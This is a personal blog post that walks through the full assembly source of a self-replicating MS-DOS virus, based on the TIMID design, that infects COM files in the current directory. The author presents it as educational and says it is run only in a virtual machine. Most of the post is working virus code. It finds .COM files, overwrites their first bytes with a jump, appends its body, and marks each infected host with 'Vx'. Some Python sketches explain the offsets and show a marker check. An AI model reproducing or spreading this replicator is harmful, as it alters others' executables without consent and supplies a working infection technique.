Those who know me very well know that one of my primary reasons for learning how to write software was to write computer viruses. Those who don't know me extremely well may mistakenly assume this was for malicious reasons. It was not. It's somewhat of a secret, but there was a time in my life when I was not good with computers at all. If you really want to know why I wanted to write viruses, you'll just have to ask me in person, because it's somewhat of a personal story for me and it's kind of too dumb to get into here.
For the rest of you who don't care, here's a story about the first computer virus I've ever written! To be clear, this is a virus in a stricter sense than the public tends to use. It infects COM files (yeah, remember those?) and runs in a fairly confined environment (its current directory). It has no malicious content, with the exception of possibly violating Title 13-2316 paragraphs 2 & 3 (Arizona Title 13-2316), which of course requires it to run without permission. Since I'm writing it and keeping it in a virtual machine, I'm pretty much 100% in the clear. So now that the legal stuff is out of the way, let's talk implementation.
The system I'll be developing on is MS-DOS 6.22. I'll be running it in a virtual machine, the setup of which I leave as an exercise for the dedicated student. For assembling I'll use the Flat Assembler (FASM). This computer virus is heavily based on the TIMID virus described by Dr. Mark Allen Ludwig in his "The Little Black Book of Computer Viruses." (Amazon)
So let's begin, a little theory seems a good start.
COM files are flat files that are loaded into memory directly. The first byte of the file (offset 0x0000) is loaded at offset 0x100 in memory, and the rest follows upward from there. The 256 bytes below that hold the Program Segment Prefix (PSP), a throwback to the CP/M operating system. For the particularly curious Wikipedia has a fairly well rounded article here.
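To make the offset arithmetic concrete, here is a minimal Python sketch that models the load. The helper names (`load_com_image`, `memory_offset`) are mine, the PSP is just zero-filled, and the size check is only a rough upper bound, so treat it as an illustration rather than an emulator.

```python
PSP_SIZE = 0x100  # the 256-byte Program Segment Prefix sits below the program


def load_com_image(file_bytes: bytes) -> bytearray:
    """Model a COM load: a (blank, hypothetical) PSP followed by the file."""
    if len(file_bytes) > 0x10000 - PSP_SIZE:
        raise ValueError("too large for a single 64 KiB segment")
    return bytearray(PSP_SIZE) + bytearray(file_bytes)


def memory_offset(file_offset: int) -> int:
    """Translate an offset in the file to an offset in the loaded segment."""
    return PSP_SIZE + file_offset


# The 5-byte exit stub stored as HOST_IMAGE in the listing.
program = bytes([0xB8, 0x00, 0x4C, 0xCD, 0x21])
segment = load_com_image(program)
```

Byte 0 of the file ends up at `segment[0x100]`, which is why the listing starts with `org 0x100`.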
Viruses may have several goals and these goals are up to the implementer to choose. For instance, the number 1 priority may be to replicate itself. A reasonable number 2 priority may be to survive. Since I'm really just interested in the fundamentals of virology we'll stick with focusing merely on this number 1 priority - Replication.
In order to replicate, the virus has many options. It may attach itself to the beginning of a file, or to the end, or break itself up and spread itself around in the file (e.g. CIH). Inserting at the start of a COM file is difficult if the program uses any absolute offsets, as this will shift all of them. Breaking the virus up is obviously the most complicated option, though likely one of the best for subverting detection.
Basically, this is my first virus so we'll stick with the easiest, inserting the virus at the end of the COM file.
We'll need a few things:
- A routine which will identify potential files to infect.
- A routine to perform the infection while preserving enough information to reconstruct the original code to continue to execute effectively.
- A payload (may be as simple as just a ret), we'll use a print call when infecting, same as TIMID.
A common issue is that the viral code, when attached to the end of a file, will end up at a different location in memory for every host. So we cannot rely on too many absolute addresses, with a few exceptions related to the operating system (e.g. the PSP mentioned above). My solution involves determining the current code location and then referencing data members at a fixed offset from there. This is probably the most notable variation from TIMID; the rest is largely the same.
I use various DOS syscalls. One of the most important sets up a temporary Disk Transfer Area (DTA), which receives the results of the file search (the file's size and name, among other things) while we look for files. For a reference to the other DOS syscalls see here.
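The address arithmetic behind that idea can be sketched in a few lines of Python. The numbers are hypothetical: I assume the `get_start` label assembles to 0x0116, a data label assembles to 0x0200, and the host file is 0x400 bytes long. Only the 0x105 address of the `virus` label follows from the listing (3 bytes of `jmp` plus 2 bytes of `'Vx'` after `org 0x100`).

```python
def delta_offset(runtime_addr: int, assembled_addr: int) -> int:
    """Difference between where a label runs and where it was assembled (16-bit)."""
    return (runtime_addr - assembled_addr) & 0xFFFF


def runtime_address(delta: int, assembled_addr: int) -> int:
    """Where a label assembled at `assembled_addr` actually lives at run time."""
    return (delta + assembled_addr) & 0xFFFF


ASSEMBLED_VIRUS = 0x0105      # 'virus' label in the original listing
ASSEMBLED_GET_START = 0x0116  # hypothetical assembled address of 'get_start'
ASSEMBLED_DATA = 0x0200       # hypothetical assembled address of a data label

host_size = 0x400                               # hypothetical host length
runtime_virus = 0x100 + host_size               # body now starts after the host
shift = runtime_virus - ASSEMBLED_VIRUS         # how far everything moved

# The value popped into si is the run-time address of get_start.
popped = ASSEMBLED_GET_START + shift
delta = delta_offset(popped, ASSEMBLED_GET_START)
data_at_runtime = runtime_address(delta, ASSEMBLED_DATA)
```

With these assumed numbers `delta` equals `shift`, so every `[si + label]` reference in the listing resolves to the relocated copy of that label.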
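For reference, the search record that DOS leaves in the DTA is 43 bytes long, and the listing reads the file size at offset 26 and the file name at offset 30. Here is a small Python sketch that unpacks such a record. The `parse_dta` helper and the sample record are my own, built only to show the layout.

```python
import struct

# 21 reserved bytes, attribute byte, time word, date word,
# 32-bit file size (offset 26), 13-byte NUL-terminated name (offset 30).
DTA_FORMAT = "<21sBHHI13s"


def parse_dta(dta: bytes) -> dict:
    """Unpack the find-first/find-next record from a DTA buffer."""
    _reserved, attr, _time, _date, size, raw_name = struct.unpack(
        DTA_FORMAT, dta[:struct.calcsize(DTA_FORMAT)]
    )
    name = raw_name.split(b"\x00", 1)[0].decode("ascii")
    return {"attr": attr, "size": size, "name": name}


# A made-up record for a 1234-byte file with the archive attribute set.
sample = struct.pack(DTA_FORMAT, b"\x00" * 21, 0x20, 0, 0, 1234, b"HELLO.COM")
entry = parse_dta(sample)
```

Note that the listing only reads the low 16 bits of the size field, which is enough for COM files since they have to fit in one segment.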
;Origin is 0x100 - This is for COM files, which include
; a 256 byte PSP (Program Segment Prefix)
org 0x100
use16
start_file:
host:
jmp near virus ;Make it look like this file is infected.
db 'Vx'
virus:
sub esp, 0x80 ; new DTA space.
mov ebp, esp ; ebp will point to our DTA
lea dx, [esp] ; address for new DTA
mov ah, 0x1A ; set DTA
int 0x21 ; syscall, create new DTA space.
call get_start ;
get_start:
pop si ; pop the return address (IP) pushed by the call, this is our location.
sub si, get_start ; si is ready to handle offsets to the data section
call find_file ; Find an infectable file.
jnz fin ; Failed to find a file, bail.
call infect ; Infect the file!
fin:
push si ; Reimage the host bytes
lea si, [si+HOST_IMAGE]
lea di, [0x100] ; Default starting position
mov cx, 0x05 ; Number of bytes to image
rep movs BYTE [di], [si] ; Copy 5 bytes from *si to *di
pop si ; Restore si
mov dx, 0x80 ; reset to use default DTA
mov ah, 0x1A ; set DTA function
int 0x21 ; syscall
mov esp, 0xFFFF ;
mov ebp, esp ; Restore the stack
push 0x100 ; push the "new" return address
ret
;-----------------------------------------------
;Find infectable files.
;-----------------------------------------------
find_file:
lea dx, [si + files] ; searching COM files
mov ah, 0x4E ; search function id
ff_loop:
mov cl, 0x06 ; attribute mask
int 0x21 ; syscall
or al, al ; set flags from al: zero means a file was found
jnz done ; non-zero means no file was found, so we're done.
call check_file ; check if this file is infectable
jz done ; file is infectable, return to main
mov ah, 0x4F ; file was not infectable, search next (function id)
jmp ff_loop ; --
check_file:
;First we check the size of the file to ensure our virus can fit in it!
push dx
xor bx, bx ; Clear bx, this represents our soon to be file handle.
mov ax, [ebp + 26] ; Value at our DTA + offset to file size (low word)
cmp ax, 0x05 ; Make sure it's *at least* 5 bytes
jl bad_file ; File is too small!
add ax, end_file - start_file + 0x100 ; End of virus - start of virus + size of PSP
jc bad_file ; File is too big to accommodate this virus.
mov ax, 0x3D02 ; Open file with read/write
lea dx, [ebp + 30] ; Our DTA + offset of file name
int 0x21 ; open file.
jc bad_file ; failed to open file?
mov bx, ax ; Open succeeded, file handle is in bx.
mov ah, 0x3F ; Read file
mov cx, 0x05 ; 5 bytes worth
lea di, [si + START_IMAGE] ; load the effective address of the start_image
mov dx, di ; dx is what the syscall actually uses.
int 0x21 ; syscall
jc bad_file ; error, and we've already ruled out partial reads (less than 5)
;------Ensure the file is not already infected.
cmp BYTE [di], 0xE9 ; Check for the jmp near.
jne good_file ; It wasn't, so it's not infected.
cmp WORD [di+3], 0x7856 ; Check for 'Vx'
je bad_file ; The file was infected, next file.
good_file:
pop dx ; Restore registers
xor al, al ; Return status is good
ret ; Return to caller with the file in the DTA.
bad_file:
or bx, bx ; Checking for a file handle
jz no_handle ; no handle to close
mov ah, 0x3E ; close file
int 0x21 ; syscall - close the file.
no_handle:
pop dx ; Restore registers
mov al, 0x01; Return status is no file found
or al, al ; Set flags for status check
ret ; Return to caller with no file found.
done:
ret
;-----------------------------------------------
;Infect, copy mechanism
;-----------------------------------------------
infect:
;At this point the file is still open, the handle is in bx.
lea di, [ ebp + 26] ; size of com file being infected
mov ax, [di]
mov cx, ax
lea di, [si + START_VIR + 1]; The jmp offset
sub cx, 0x03 ; Remove the near jmp size.
mov [di], cx ; the offset to jmp to
xor ax, ax ; Seek to start
mov cx, ax
xor dx, dx
mov ah, 0x42 ; seek function, al = 0 means from start of file
int 0x21 ; syscall
mov ah, 0x40 ; write to file
mov cx, 0x05 ; writing 5 bytes.
lea dx, [si + START_VIR]
int 0x21 ; write file
xor ax, ax ; Seek to end
mov cx, ax
xor dx, dx
mov ax, 0x4202 ; end of file
int 0x21 ; syscall
mov ah, 0x40
mov cx, end_file - virus;size of virus
sub cx, 0x05 ; Write all but 5 bytes, this will get start_image
lea dx, [si + virus] ; virus beginning
int 0x21 ; copy the virus out!
mov ah, 0x40 ; do another write to give HOST_IMAGE
lea dx, [si + START_IMAGE] ; to the newly infected file.
mov cx, 0x05 ; Just 5 bytes.
int 0x21 ;
mov ah, 0x3E ;close file
int 0x21 ;syscall
push dx ; print infection message
lea dx, [si + banner]
call print
pop dx
ret
;-----------------------------------------------
;Helper methods, these'll go away in the final product
;-----------------------------------------------
print:
push ax ; Makes this function non-destructive.
mov ah, 0x09 ; Print '$'-terminated string
int 0x21 ; print the string at ds:dx, this is for debugging
pop ax ; Restore registers
ret ; Return to caller
;-----------------------------------------------
;Data Section
;-----------------------------------------------
banner db 'Catatonic says "Hi!"', 0x0D, 0x0A, 0x24
files db '*.COM', 0x00
START_VIR db 0xE9, 2 dup(?), 'Vx'
START_IMAGE db 0x05 dup(?)
HOST_IMAGE db 0xB8, 0x00, 0x4C, 0xCD, 0x21 ; simple exit program.
end_file:
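The marker test in check_file (a leading 0xE9 followed two bytes later by 'Vx') is just as easy to run from the outside. Here is a minimal Python sketch of that check as a scanner would do it. The function names are mine and the sample header assumes a hypothetical 0x400-byte host.

```python
MARKER = b"Vx"  # the two bytes stored after the jmp in START_VIR


def looks_infected(head: bytes) -> bool:
    """True if the first 5 bytes match the pattern check_file looks for."""
    return len(head) >= 5 and head[0] == 0xE9 and head[3:5] == MARKER


def jump_target(head: bytes) -> int:
    """File offset reached by a leading jmp near (E9 rel16)."""
    rel16 = int.from_bytes(head[1:3], "little")
    # The displacement is relative to the end of the 3-byte instruction.
    return (3 + rel16) & 0xFFFF


clean_head = bytes([0xB8, 0x00, 0x4C, 0xCD, 0x21])   # the exit stub
marked_head = bytes([0xE9, 0xFD, 0x03]) + MARKER     # jmp to offset 0x400
```

The `3 + rel16` step is the mirror image of the `sub cx, 0x03` in infect: the stored displacement is the original file size minus the length of the jump itself.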
That's it! Sorry I'm not going more in depth on the specifics - this post is several months old for me now and I figured I'd just push it out instead of breaking it up or other things.
I believe this source code is good (if I recall correctly) and here is a screenshot of the results:
Have fun and stay safe!